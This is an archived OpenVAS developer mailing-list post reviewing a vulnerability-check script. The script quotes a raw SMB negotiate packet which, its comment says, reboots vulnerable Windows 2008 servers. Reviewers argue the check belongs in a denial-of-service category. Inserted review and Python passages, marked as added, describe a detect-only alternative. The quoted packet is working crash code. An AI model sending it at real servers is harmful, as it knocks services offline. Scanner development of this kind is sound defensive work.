[Openvas-devel] [Openvas-commits] r5349 - in trunk/openvas-plugins: . scripts

Tim Brown timb at openvas.org
Mon Oct 5 23:57:06 CEST 2009


(moved to openvas-plugins)

On Monday 05 October 2009 20:59:07 Thomas Reinke wrote:
> >    trunk/openvas-plugins/scripts/ms_smb2_highid.nasl
> >
> > + script_category(ACT_GATHER_INFO);
> >
> > +data =
> > raw_string(0x00,0x00,0x00,0x90,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x
> >00,0x18,0x53,0xc8, +                 
> > 0x00,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,0xf
> >f,0xfe, +                 
> > 0x00,0x00,0x00,0x00,0x00,0x6d,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x5
> >7,0x4f, +                 
> > 0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0
> >0,0x02, +                 
> > 0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00,0x02,0x57,0x69,0x6e,0x6
> >4,0x6f, +                 
> > 0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,0x72,0x6b,0x67,0x72,0x6f,0x7
> >5,0x70, +                 
> > 0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x3
> >0,0x30, +                 
> > 0x32,0x00,0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,0x00,0x02,0x4
> >e,0x54, +                 
> > 0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0x02,0x53,0x4d,0x42,0x20,0x3
> >2,0x2e, +                  0x30,0x30,0x32,0x00); # Tested against 2008
> > Server. A vulnerable Server doing a reboot. I'm not happy with that, but
> > a the moment i have no idea how to detect this vulnerability without
> > exploiting it. +
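Review bot: `script_category(ACT_GATHER_INFO)` at the top of this hunk does not match the behaviour recorded in the comment after the `raw_string(...)` payload, which says a vulnerable server reboots when the packet is sent. A check with that effect belongs in a disruptive category such as ACT_DENIAL, so that scans restricted to non-disruptive checks do not run it. The trailing comment should also state the reboot as an explicit warning to whoever enables the script, and the byte literal would be easier to review with a short comment naming the request it encodes (its dialect list ends with "SMB 2.002").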
>
> I suspect this script should be classified as ACT_DENIAL
> rather than ACT_GATHER_INFO, given that it causes the
> vulnerable server to reboot.

I agree.  For the record, the /safe/ version of the check would be just to 
check for SMBv2 support and flag it as a possible issue.  It's not perfect 
but AFAIK it is all that can be done at the moment.  You might also be able 
to fix up the packet so that it uses values that are unlikely to trigger the 
crash but I haven't investigated that in any detail.

Tim
-- 
Tim Brown
<mailto:timb at openvas.org>
<http://www.openvas.org/>
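Added example, not part of the original message and not OpenVAS code: the "check for SMBv2 support and flag it as a possible issue" approach described above reduces to classifying the server's reply to an ordinary negotiate request, shown here in Python over constructed sample frames. The function name, return shape and sample bytes are assumptions made for illustration.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"

def classify_negotiate_reply(frame):
    """Return (protocol, detail, flag) for one framed negotiate reply.

    flag is True only when the server answered with an SMB2 header, i.e.
    SMBv2 is enabled and the host is reported as a *possible* issue.
    """
    if len(frame) < 4 or frame[0] != 0x00:         # 0x00 = session message
        return ("unknown", "not a session message", False)
    length = int.from_bytes(frame[1:4], "big")     # payload length prefix
    msg = frame[4:4 + length]
    if len(msg) < length:
        return ("unknown", "truncated frame", False)
    if msg[:4] == SMB2_MAGIC:
        if len(msg) < 70:                          # 64-byte header + 6 bytes
            return ("smb2", "short negotiate response", True)
        command, = struct.unpack_from("<H", msg, 12)
        dialect, = struct.unpack_from("<H", msg, 68)   # DialectRevision
        if command != 0:                           # 0 = NEGOTIATE
            return ("smb2", "unexpected command", True)
        return ("smb2", "dialect 0x%04x" % dialect, True)
    if msg[:4] == SMB1_MAGIC and len(msg) >= 35 and msg[4] == 0x72:
        index, = struct.unpack_from("<H", msg, 33)     # DialectIndex
        return ("smb1", "dialect index %d" % index, False)
    return ("unknown", "unrecognised protocol id", False)

def _frame(msg):
    """Prefix a message with the 4-byte session header."""
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

# Constructed sample replies (not captured traffic).
SAMPLE_SMB2 = _frame(SMB2_MAGIC
                     + struct.pack("<HHIH", 64, 0, 0, 0).ljust(60, b"\x00")
                     + struct.pack("<HHH", 65, 1, 0x0202))
SAMPLE_SMB1 = _frame(SMB1_MAGIC + b"\x72" + bytes(27)
                     + b"\x11" + struct.pack("<H", 5))

if __name__ == "__main__":
    for name, sample in (("smb2", SAMPLE_SMB2), ("smb1", SAMPLE_SMB1)):
        print(name, classify_negotiate_reply(sample))
```

A True flag here means only that SMBv2 is enabled, which matches the "possible issue" wording above; it does not confirm that the host is unpatched.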

